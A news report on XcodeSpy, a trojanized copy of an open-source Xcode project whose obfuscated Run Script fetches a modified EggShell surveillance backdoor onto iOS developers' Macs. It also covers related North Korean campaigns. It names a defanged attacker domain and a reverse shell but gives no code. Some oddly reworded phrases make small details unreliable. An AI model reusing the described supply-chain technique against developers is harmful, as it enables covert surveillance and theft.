Researchers said they have found a trojan code library in the wild that attempts to install advanced surveillance malware on iOS software developers’ Macs.
It came in the form of a malicious project the attacker wrote for Xcode, a developer tool that Apple makes freely available to developers who write apps for iOS or any other Apple OS. The project was a copy of TabBarInteraction, a legitimate open source project that makes it easier for developers to animate iOS tab bars based on user interaction. An Xcode project is a repository for all the files, resources, and information needed to build an app.
walking on eggshells
Next to the legitimate code was an obfuscated script known as a ‘Run Script’. The script, which ran every time the developer version was launched, contacted an attacker-controlled server to download and install a modified version of EggShell, an open source backdoor that spies on users through their microphone, camera and keyboard.
Researchers at SentinelOne, the security company that discovered the trojanized project, have named it XcodeSpy. They say they have discovered two variants of the modified EggShell dropped by the malicious project. Both were uploaded to VirusTotal using the web interface from Japan, the first on August 5 and the second on October 13.
“The later sample was also found in the wild on a victim’s Mac in the United States in late 2020,” SentinelOne researcher Phil Stokes wrote in a blog post on Thursday. “For confidentiality reasons, we are unable to provide further details about the ITW [in the wild] incident. However, the victim reported that they were repeatedly targeted by North Korean APT actors and the infection came to light as part of their regular threat hunting activities.”
So far, business researchers are aware of only one case in the wild, from a US-based organization. Evidence from the SentinelOne analysis suggests that the campaign was “in operation at least between July and October 2020 and may have also targeted developers in Asia”.
Researchers under fire
Thursday’s report came two months after researchers from both Microsoft and Google said hackers, backed by the North Korean government, were actively trying to infect the computers of security researchers. To gain the trust of researchers, the hackers spent weeks building Twitter personas and developing working relationships online.
Finally, the fake Twitter profiles asked the researchers to use Internet Explorer to open a webpage. Those in the bait would find that their fully patched Windows 10 machine installed a malicious service and an in-memory backdoor. Microsoft patched the vulnerability last week.
In addition to using the watering-hole attack, the hackers also sent targeted developers a Visual Studio project that supposedly contains the source code for a proof-of-concept exploit. The project contained modified malware that contacted the attackers’ control server.
Obscured malice
Experienced developers have long known the importance of checking for the presence of malicious Run Scripts before using any third-party Xcode project. While detecting the scripts isn’t difficult, XcodeSpy tried to make the job harder by coding the script.
SentinelOne
When it was decoded, it was clear that the script had contacted a server on cralev[.]me and sent the mysterious mdbcmd command through a reverse shell built into the server.
SentinelOne
The only warning a developer would get after running the Xcode project would be something that looks like this:
Patrick Wardle
SentinelOne provides a script that makes it easy for developers to find Run Scripts in their projects. Thursday’s post also provides indicators for compromises to help developers figure out if they’re targeted or infected.
A vector for malice
It is not the first time that Xcode has been used in a malware attack. Last August, researchers discovered Xcode projects available online that contained exploits for what were at the time two zero-day vulnerabilities in Safari. As soon as one of the XCSSET projects was opened and built, a TrendMicro analysis found, the malicious code would run on the developers’ Macs.
And in 2015, researchers found 4,000 iOS apps infected by XcodeGhost, the name given to a tampered with Xcode circulating mainly in Asia. Apps compiled with XcodeGhost can be used by attackers to read and write to the device clipboard, access specific URLs, and exfiltrate data.
Unlike XcodeGhost, which infects apps, XcodeSpy targeted developers. Given the quality of the surveillance backdoor installed by XcodeSpy, it wouldn’t be difficult for the attackers to eventually deliver malware to users of the developer’s software as well.
“There are other scenarios with such valuable victims,” SentinelOne’s Stokes wrote. “Attackers can simply look for interesting targets and collect data for future campaigns, or they can try to collect AppleID credentials for use in other campaigns that use malware with valid Apple Developer code signatures. These suggestions do not exhaust the possibilities nor are they mutually exclusive.”